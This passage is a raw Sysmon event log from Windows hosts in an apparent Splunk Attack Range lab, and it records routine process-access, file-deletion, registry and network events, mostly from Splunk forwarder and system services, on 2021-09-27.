09:15:55.256{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050976Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:55.256{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050975Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:55.256{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050974Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:55.256{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8BCB-6151-537A-00000000FC01}4484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050973Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:55.241{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8BCB-6151-537A-00000000FC01}4484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050972Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:55.242{5EBD8912-8BCB-6151-537A-00000000FC01}4484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000979666Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:56.980{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A7EC5145CE2BD97BFFB694112C88E72,SHA256=1002C5C8356D4D2A045EBE449FD048F4FDF671E3E2496147A52549B5C4BBD4E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050993Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:53.917{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53422-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001050992Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:53.894{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55732-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050991Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:56.293{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=243691987BEEDE47D144E8DEA82C393D,SHA256=7CD355E2669ED6AF12EFBE025EA313E42493BE54972E8C7590397A6F259ABE82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050990Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:56.256{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE0B4E9B8EDECA9AFD071A7D385617A2,SHA256=382A5998F6BF0250A9D344ED91CEF1653DD5BB4F920313C31E8929A079A04B78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979668Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:57.995{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB2789D6F232CC939CC903A10410D712,SHA256=8D2DF4DCBC1BAFCD678AC96897EC9E626AD29CE7444B4E869E2CF9C181BDD1C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050994Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:57.308{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=490EBF26A316FF92C41C7CFCD957DD2B,SHA256=60FB6514806418F1B7D3E89F78B695B87772A08E1DE41446F6C8F862AD83BD2A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979667Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:54.808{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59433-false10.0.1.12-8000- 23542300x8000000000000000979669Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:58.995{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49374092875A4044F9C67A8F3BA7E988,SHA256=03423FF8E235E8909566CF771C06F5248A1E82A36CB3033192B64A98E2B4DE5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050996Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:58.391{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7EBD6BAB3AF6D14EE7625E6F88D23B5D,SHA256=A53725F587BE456EAAC18AC723163B2A3726B8C64D1356050A157381373647C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050995Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:58.322{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD5AA814B0C2EA08D9B78EB9E6744A73,SHA256=AC6299D2AA0A2581F9D9B2C9D5BA2973496AEE629EF7B4BD3D8E13CC934D051F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050998Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:56.478{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-57421-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050997Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:59.338{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D62078DA6BE6FFCDC394452E3B636FB4,SHA256=942AE71961F252266C3DFE298BF0060BF1A0299C2BEC7C782966A94E5D5310B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050999Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:00.406{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=567415A8B7C5F503094DCE0088C769E4,SHA256=4699EF57ABDC96280C2377BA774441A4C7B7070E7F674BEA7622872CC474456E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979672Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:00.823{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3B52347EDDEBCD35CD95A91113FC5CE9,SHA256=7EB84A2210D3AFD53BC1D68A939B00242770632FBAD22E59FB7793ACE2C9C185,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979671Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:00.823{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=66B3503D74BDC329EC9B8F2E8C870503,SHA256=C996FE43E1AAA708F1AF5CBFBF5995FBE4A5C0AB85FB4273E8D806A7C4E32BCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979670Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:00.011{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9932F3CF5DCB32A595578DFD61435C07,SHA256=B7157E9BA90C26A9BC5FF74DDFAC5ABA34F60B657DE1A416AA4B99E34CD684DD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051001Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:59.744{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53423-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001051000Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:01.436{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3435D5050EEE3947F11E6333DBDC430B,SHA256=D06508AB52611F516F7DC2062A2892AF0BD66F62779F80C7853CFBEDCAC80629,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979674Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:58.094{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-49208-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979673Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:01.011{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9C0BBDF623C0BE6F3D19D07CD9D90E3,SHA256=646FDE81A51C4BEA77EBCAF7834D5334774DD3276B2BE50D77AD5E6ED372355C,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001051005Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:16:02.735{5EBD8912-7F40-614D-2B00-00000000FC01}3008C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\8EFF07E0-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_8EFF07E0-0000-0000-0000-100000000000.XML 13241300x80000000000000001051004Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:16:02.719{5EBD8912-7F40-614D-2B00-00000000FC01}3008C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\C073BBA9-345E-4F58-AADF-98D983B75502\Config SourceDWORD (0x00000001) 13241300x80000000000000001051003Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:16:02.719{5EBD8912-7F40-614D-2B00-00000000FC01}3008C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\C073BBA9-345E-4F58-AADF-98D983B75502\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_C073BBA9-345E-4F58-AADF-98D983B75502.XML 23542300x80000000000000001051002Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:02.469{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25A0FFD2F0AF4BF58C629385E6FCA528,SHA256=4A39517D6DFD4537A95B954BA856D863FBFBB2219A418915202D4E1CC48D3A84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979675Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:02.027{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12CF83056BA9D12E6ACFF5E1D9319570,SHA256=9C1CB80138F27F0BDE39428E4733942F8AF734EDB9094EC05B6AC996BD9C3947,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051008Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:03.751{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EFB36B25420160C0B5E6A9E4305CC438,SHA256=5F9C44BD9E1A91C381CC984C10E93B147774453459791FA60C041647B742C275,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051007Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:03.751{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1563C3CF606D00F02C169E81CBCDB398,SHA256=A6BBB85868EEC60557AB428AC8CF5DA32CA5C144A151AF2A4D087222DBC58E7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051006Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:03.488{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C426B453FB91F06FCF07D653EB3C111F,SHA256=2649C85766E2BAD6785C75FA6EAEE43225B302C4C81BFEEC092C6A8F55BEAC21,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979677Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:00.823{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59434-false10.0.1.12-8000- 23542300x8000000000000000979676Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:03.031{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17FFCE472AA4AF59CFEF749325FFFF9D,SHA256=5BD73B3C64A07ED8615858DB3247AF6F86053B9472466F9132E20760CD943798,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051015Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:02.445{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53426-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001051014Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:02.445{5EBD8912-7F40-614D-2B00-00000000FC01}3008C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53426-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001051013Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:02.436{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53425-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001051012Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:02.436{5EBD8912-7F40-614D-2B00-00000000FC01}3008C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53425-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001051011Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:02.412{5EBD8912-7F30-614D-0D00-00000000FC01}888C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53424-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local135epmap 354300x80000000000000001051010Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:02.412{5EBD8912-7F40-614D-2B00-00000000FC01}3008C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53424-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local135epmap 23542300x80000000000000001051009Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:04.503{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5647745F07B0033E033F265A410A125D,SHA256=5B78997E6E69CE5C79CD56503EE37380E464D004C19465EEC13E2AF20871DBBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979678Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:04.046{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43BF5BE1070394B580CBE2BBF0624EB6,SHA256=A7CCDB81315BE275AADD90EF655919C41CDD2E1568D6B0BE4D172C7983F79EFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051017Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:05.518{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=620E726495B9C6DB5BB8C0FEBBBC16D6,SHA256=DC791EE29AD99A667047F13CA6FD295917EBF454E3BF375877BBCDA649DC19C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979679Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:05.062{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5BD37F9B8296B41364C3BD3FC3E212B,SHA256=1E8EC8EF40BD922A48BBD6C783B9873FE8BF369494F18E0BCCE902E8852D376F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051016Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:05.186{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EFB36B25420160C0B5E6A9E4305CC438,SHA256=5F9C44BD9E1A91C381CC984C10E93B147774453459791FA60C041647B742C275,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051019Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:03.533{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-53971-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001051018Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:06.518{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=769B19D3A1A9E6064F7E0C3B11C992F0,SHA256=7C48442FABB1A01741F03B8A4A96BC005AFC3C5F40F32EE3ADC0363F821872ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979680Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:06.062{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 